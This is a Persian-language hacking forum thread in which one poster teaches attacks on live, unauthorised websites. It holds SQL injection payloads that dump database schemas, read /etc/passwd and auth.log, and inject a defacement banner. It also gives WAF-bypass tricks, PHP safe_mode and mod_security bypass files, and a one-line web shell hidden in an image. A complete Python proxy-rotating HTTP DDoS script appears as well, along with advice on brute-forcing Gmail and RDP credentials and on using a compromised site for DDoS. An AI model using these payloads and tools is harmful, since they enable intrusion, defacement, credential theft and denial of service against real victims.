k.shadow

درود سری سوم export_set تا حدودی مثل make_set هست ولی با کمی تفاوت اموزش بعدی انشاا... multi (اگه تارگت پیدا کنم ) یا کوکی اینجکشن export _set.part1.rar export _set.part2.rar تشکر ....

make_set درود ضمن قبولی طاعات و عبادات با اموزش بعدی از سری اموزش های sql injection using creative pro در خدمتتون هستم این اموزش: make_set تابع بسیار کارآمد در بایپس group_concat اکثر سایت ها اینو فیلتر نکردن پسورد : guardiran.org make_set.part1.rar make_set.part2.rar تارگت [Hidden Content]

سلام و درود ضمن قبولی طاعات و عبادات دوستان بر طبق هماهنگی های به عمل آمده قرار شد این تاپیک رو با موضوع sql injection using crative pro یا همون خلاقیت در sqlinjection اغاز کنم قوانین قوانین کلی انجمن هست احتمالا دوستان و اعضای گارد ایران تاکنون با باگ sqli اشنا شدن و اینجکت هارو (union based,error based, blind based ,....) از من هم بهتر یاد دارند اموزش sql injection پس اقدام به ایجاد تاپیک کردم در این تاپیک سعی دارم روش های جدید و خلاقانه در اینجکت تارگت هارو به کار بگیریم روش هایی که سعی دارم فعلا اموزش قرار بدم polygon error based استفاده از make_set به جای group_concat استفاده از export_set به جای group_concat استفاده از روش multi query post در بایپس و روش هایی که دوستان در خواست کنن خواهشمندم دوستان از پرسیدن سوال در این تاپیک خود داری کنند برای جلوگیری از اسپم سعی میکنم تاپیک سوالو جواب های sqlinjection ایجاد کنم برای اولی اموزش رو اماده کردم با پسورد guardiran.org اموزش polygon error based هست فایل کدهای استفاده شده رو هم با فیلم قرار دادم تارگت: [Hidden Content] اینم اموزش امید وارم لذت ببرید ... polygon error based.rar

درود ممنون از تشکرتون ببینید این فایل هارو که ایجاد کردید توسط شلر یا ... توی مسیر جاری مثلا: /home/user/site/publichtml اپلود کنید بعد یک دور شلرتون رو دوباره اپلود کنید و شلر قبلی رو پاک کنید (این مرحله شاید نیازی نباشه همون رفرش کنید خو به رو بعضی جا ها واقعا نیازه )بعدخواهید دید safemode خاموش شده رو اکثریت سرور ها و با php های ورژن مختلف جواب میده ولی صد درصد نیست عذر خواهی میکنم اگر بد توضیح دادم

درود شما باید جامپ استار (دقیق نمیدونم چی بگم ) رو نصب کنید پیوست کردم: هر کاری کردم پیوست نشد احتمالا اینترنت من مشکل داره با عرض پوزش : [Hidden Content]

درود تا جایی که من اطلاع دارم بایپس مد امنیتی همون بایپس safemode هست که روش های گونا گونی هم داره (با توجه به ورژن php ) مثلا 1: از طریق php.ini یک فایل با این نام بسازید و داخلش این کد رو بزارید : safe_mode = Off یا - short_open_tag = On log_errors = On log_errors_max_len = 1024 ignore_repeated_errors = On register_globals = Off magic_quotes_runtime = Off magic_quotes_gpc = On allow_url_fopen = on AddHandler application/x-httpd-php4 .php display_errors = Off disable_functions = by J.ALL_EdiT0r safe_mode = Off از ini.php: یک فایل با این نام بسازید و داخلش اینو بنویسید <? echo ini_get("safe_mode"); echo ini_get("open_basedir"); include($_GET["file"]); ini_restore("safe_mode"); ini_restore("open_basedir"); echo ini_get("safe_mode"); echo ini_get("open_basedir"); include($_GET["ss"]); ?> و htaccess. یک فایل با این نام بسازید و داخلش اینو بنویسید <Files *.php> ForceType application/x-httpd-php4 </Files> ahm tas: <ifModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule> برای php 5 htaccess فکر نکنم جواب بده بهترین روش دوتای باالا هست و اگر نشد دیگه برید سراغ سیمیلینک این کد ها که براتون قرار دادم اکثر محدودیت های دیگه مثل display function رو نیز خاموش میکنه پیروز باشید.....

sql injection uk [Hidden Content]' UNION SELECT 1,2,3,group_concat(column_name,0x3c62723e),5,6,7,8,9,10,concat(0x3c68746d6c3e3c623e203c666f6e7420636f6c6f723d2223393930303030223e20796f75722073697465206861636b65642042792c3c62723e2c3c666f6e7420636f6c6f723d222366434343433636223e2067756172646972616e207365637572697479207465616d2c3c62723e2c3c666f6e7420636f6c6f723d2223434330303030223e544e5820414c4c2067756172646972616e20646566656e636572732c3c62723e2c3c666f6e7420636f6c6f723d2223303030304646223e204a2e414c4c5f4564695430722c3c62723e2c3c666f6e7420636f6c6f723d2223303030304646223e3c2f623e),12,13,14 from information_schema.columns where table_name=0x61646d696e5f7375627061676573-- - [Hidden Content]#

مثل همیشه sqli to lfi [Hidden Content],2,3,4,5,6,7,8,9,load_file%280x2f7661722f6c6f672f617574682e6c6f67%29,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--

درود تارگت برای دیداس خوبه iHS هم اپلود کردم IHS.pl اسیبی بهش نزنید سرور خوبیه برا دیداس www.standrews-children.org.uk/1234.php پیروز باشید ....

درود اینجکت کردم ولی تیبل مشکوکی به چشمم نخورد [Hidden Content]' /*!50000UNION*/ SELECT 1,/*!50000unhex(hex(group_concat(table_name,0x3c62723e)))*/,3,4,5,6,7,8,9 from information_schema.tables /*!50000where*/table_schema=/*!50000database()*/ -- - ادمین پیج : [Hidden Content]

درود ببینید اصول کرک md5 اینه که میان ببینن تو پسورد لیستشون موجود هست یانه چون کلید دیکریپتش لو نرفته پس دلیل نمیشه هر md5 کرک شه مگه خودتون بورت فورس کنید من با این دو سایت امتحان کردم نشد (برای اینکه بی جواب نمونین) [Hidden Content] [Hidden Content]

درود بدون تارگت سخته توضیح دادن ولی روش های بسیاری برای بایپس هست پیشنهاد میکنم تارگتتونو قرار بدید روش کار کنیم مثلا from : FROM /*!FROM*/ FRom /*!123456FROM */ /*!222222FrOm*/ %23%0afrom %23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0afrom ........... و information_schema هم به همین ترتیب روش post رو هم اضافه کنید معمولا جواب میده بایپس زیاد هست شما تارگتتون رو قرار بدید بهتر میتونیم راهنمایی کنیم بایپس database() هم میشه @@database پیروز باشید .............

ابزار هایی که معرفی کردم از دیداسر های معروف هستند و حتما پروکسی دارن ولی باز هم : شما یک سرچ کنید حتما پیدا میکنید [Hidden Content]

درود تا جایی که من اطلاع دارم هیدرا برای کرک vps نیست که !! از dubrute استفاده کنید البته قبلش باید تارگت هاتون رو متمان باشید که پورت ریموت (3389و.....) باز باشه [Hidden Content] اموزش رو دنبال کنید (تو اپارات هم اموزش هست [Hidden Content] ) سربلند باشید ....

درود ببینید کلا جیمیل بعد از 3 یا 5 بار امتحان کردن رمز ایپی رو بلاک میکنه وهیدرا رمز 3 یا 5 ام رو بهتون میده از پسورد لیستتون که اشتباه هست راه حل :1 استفاده از پروکسی لیست در هیدرا قبلا را جبش بحث شده [Hidden Content] 2- استفاده از کرکر های دیگه که سرعت بالا و قابلیت اضافه کردن پروکسی لیست داشته باشن مثل sentrymba یا matrix (البته ماتریکس یکم قدیمی شده ) موفق باشید ........

دیداسر با قابلیت اتصال با پروکسی

اها حالا فهمیدم خوب دوتا راه دارید 1- اگه کار با اسکریپت پایتون رو بلد باشین از این اسکریپت میتونید استفاده کنید اون قسمت listaproxy = proxyf.split یوزر ایجنت رو هم میتونید تغییر بدید #!/usr/bin/env python #coding: utf8 import random import socket import threading import time userAgents = ["Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3", "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0", "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0", "Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0", "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0", "Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0", "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0", "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)", "Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)", "Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00", "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14", "Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14", "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14", "Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02", "Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00", "Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00", "Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)", "HTC_Touch_3G Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)", "Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0; Nokia;N70)", "Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+", "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+", "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.115 Mobile Safari/534.11+", "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+", "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7", "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5", "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10", "Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3", "Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",] def randomIp(): random.seed() result = str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) + '.' result = result + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) return result def randomIpList(): random.seed() res = "" for ip in xrange(random.randint(2, 8)): res = res + randomIp() + ", " return res[0:len(res) - 2] def randomUserAgent(): return random.choice(userAgents) class attacco(threading.Thread): def run(self): # il thread si prende l'ID current = x # se l'ID è associabile ad un proxy, usa il proxy corrispondente if current < len(listaproxy): proxy = listaproxy[current].split(':') else: # altrimenti ne sceglie uno casuale proxy = random.choice(listaproxy).split(':') # composizione dell'header http useragent = "User-Agent: " + randomUserAgent() + "\r\n" forward = "X-Forwarded-For: " + randomIpList() + "\r\n" httprequest = get_host + useragent + accept + forward + connection + "\r\n" # questo ciclo fa aspettare che tutti i threads siano startati prima di cominciare while nload: time.sleep(1) # ciclo infinito dell'attacco while 1: # try perché non vogliamo che un errore ci fermi il thread try: # dichiarazione del socket a = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # connessione al proxy a.connect((proxy[0], int(proxy[1]))) # invio della richiesta http a.send(httprequest) # dopo aver inviato la prima richiesta http con successo # c'è la possibilità che se ne possano inviare altre # sulla stessa connessione grazie alla # connessione keep-alive. visto che non c'è la certezza # è meglio metterlo in un try tutto suo try: # invia la richiesta al massimo per altre 3 volte # si è visto che è una scelta abbastanza ottimizzata for i in xrange(3): a.send(httprequest) except: # variabile al momento inutile, tanto per fargli fare # qualcosa dentro l'except, probabilmente in futuro servirà tts = 1 except: # nel caso in cui durante la prima richiesta http avvenga un errore # c'è la possibilità che il proxy non funzioni correttamente # quindi si provvede a cambiare proxy proxy = random.choice(listaproxy).split(':') # grafica varia print(" .----.BoosTHTTPv3.0 iPerFul DDoS for HTTP WebSite.----.") print(" .----.Creator: TheRunixx & Huggye.----.") # input del sito url = raw_input("Sito: ") host_url = url.replace("http://", "").replace("https://", "").split('/')[0] # qui viene caricata la lista proxy dal file proxy.txt in_file = open(raw_input("Lista proxy: "),"r") proxyf = in_file.read() in_file.close() # grazie al caro split() ora la lista è una lista listaproxy = proxyf.split('\n') # input del numero di threads thread = input("Thread (800): ") # dichiarazione di alcuni pezzi dell'header get_host = "GET " + url + " HTTP/1.1\r\nHost: " + host_url + "\r\n" accept = "Accept-Encoding: gzip, deflate\r\n" # con "Connection: Keep-Alive, ecc..." è possibile, anche se non dovrebbe esserlo, inviare # ai proxy più richieste http usando la stessa connessione connection = "Connection: Keep-Alive, Persist\r\nProxy-Connection: keep-alive\r\n" # nload (not loaded) è 1 quando i threads non sono ancora stati tutti avviati # e diventa 0 quando il ciclo di avvio dei threads è finito nload = 1 # x serve a dare "l'id" del thread x = 0 # ciclo di avvio dei threads for x in xrange(thread): attacco().start() time.sleep(0.003) print "Thread " + str(x) + " started!" print "The attack is running..." # nload diventa 0 e i thread iniziano a lavorare nload = 0 #ciclo nabbo in fondo while not nload: time.sleep(1) 2- اگر نه هم میتونید از برنامه های DoSHTTP یاudp flood By R00Tیا Anonymous External Attack تحت ویندوز باید باشن که اموزش Anonymous External Attack تو اپارت هم بود (من همون اسکریپته رو ترجیح میدم ولی خودم اولین بار که میخوام باهش کار کنم )

سلام یک تارگت گیر اوردم برای اپلود شل با sql میخواستم اینجکت کنم دیدم باید blind برم این راحت تره [Hidden Content] UNION SELECT 1,2,3,4,5,6,7,8,9,load_file(0x2f6574632f706173737764),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--

درود من از این نرم افزار ها استفاده میکنم راضی هم هستم [Hidden Content] [Hidden Content] ولی hidemyip بهتره به نظر من (هنوز مشکل شمارو نمیدونم ) ولی چیزی که نیاز دارید پروکسی هست

سلام هر سایتی که شما اینجکت میکنید دلیل نداره که حتما صفحه ادمین داشته باشه چون امکان داره از جای دیگه ای مدیریت بشه ولی در هر صورت تارگت رو میتونید از طریق سیپنل بزنید [Hidden Content] من با acunetix , havig و robots.txt و فایل هاش چک کردم ولی پیدا نشد

سلام ببینید دوست عزیز مبحث دیداس مبحث ساده ای نیست و خیلی پیچیدس ولی خوب برای دیداس عادی میتونید از این تاپیک ها استفاده نمایید کافی بود تو گوگل سرچ میکردید [Hidden Content] ابزار ddos برا اینکار شما باید پورت های باز رو اسکن کنید ببینید چه نوع پکیج اطلاعاتی رو قبول میکنه مثلا: یک سایت پکیج اطلاعاتی udp قبول میکنه که خیی راحت با این اسکریپت ها دون میشه پیشنهاد من به شما اینه برای دیداس از یک سرور استفاده کنید چون حجم اینترنت بسیاری از شما هدر میده

سلام با اجازه از مدیران و دوستان گل گارد ایران ببینید دوست عزیز خوب باید یک فایل دانلود بشه که بفهمیم سایت اسیب پذیر هست یا خیر شما ادرس یا نام pdf رو از جلوی download.php?file= بردارید ومثلا بزنید file://etc/passwd اگه فیلتر نشده باشه (access denide )نده دانلود میشه و اما برای سایت [Hidden Content] پورت 3306 که مدیریت mysql رو بر عهده داره بازه من زیاد روش کار نکردم نمیتونم راه حل قطعی بدم ولی شما میتونید با استافده از بعضی نرم افزار ها (رو اینترنت سرچ کنید ) به 3306 کانکت بشید با یوزر و پسورد شایت هم اون ورژن رو بشه اکسپلویت کرد (بازم سرچ کنید ) کلا باگ lfd خیلی کمک بعضی وقتا میتونه بکنه ویرایش ............. از این نرم افزار هم میتونید استفاده کنید [Hidden Content]

[Hidden Content]

ببینید من یک فیلم دارم مال خیلی وقت پیه ولی هنوز جواب میده ببینید منظور منو کامل میفهمید [Hidden Content]

سلام دوست عزیز ببینید امنیت هیچ وقت صد در صد نیست ولی بله امکان داره نشه اپلود کرد بستگی به cms تون هم داره همه مواقع نباید از طریق اپلود عکس شل اپلود کرد بعضی مواقع مثل ورد پرس باید از طریق اپلود پلاگین شل بریزید بعضی وقتا از طریق اپلودر ویدئو شل بریزید بعضی وقتا باید برید تو ستینگ ادمین *.php* اد کنید که بزاره شل بزنید در کل راه هایی هست که غیر از اپلودر عکس شل بریزید حتی بعضی وقتی خود پنل ادمین در حال اینکلود یک صفحه میبیند باگ lfi داد با پسوند lnk هم یک امتحانی بکنید شاید جواب داد shell.php.lnk یه نرم افزاری هم براتون اپلود کردم طرز کارش به این صورت هست ابتدا شما یه عکس با پینت درست کنید و پس زمینه رو یک رنگی بزنید و با jpeg سیو کنید بعد فایلتون رو بکشید رو نرم افزار یک صفحه باز میشه شلرتونو بریزید توش (البته نه یک شلر با حجم بالا مثل یک کد مثل <?php system ($_GET['cmd']); ?> ( فایلتونو اپلود کنید [Hidden Content]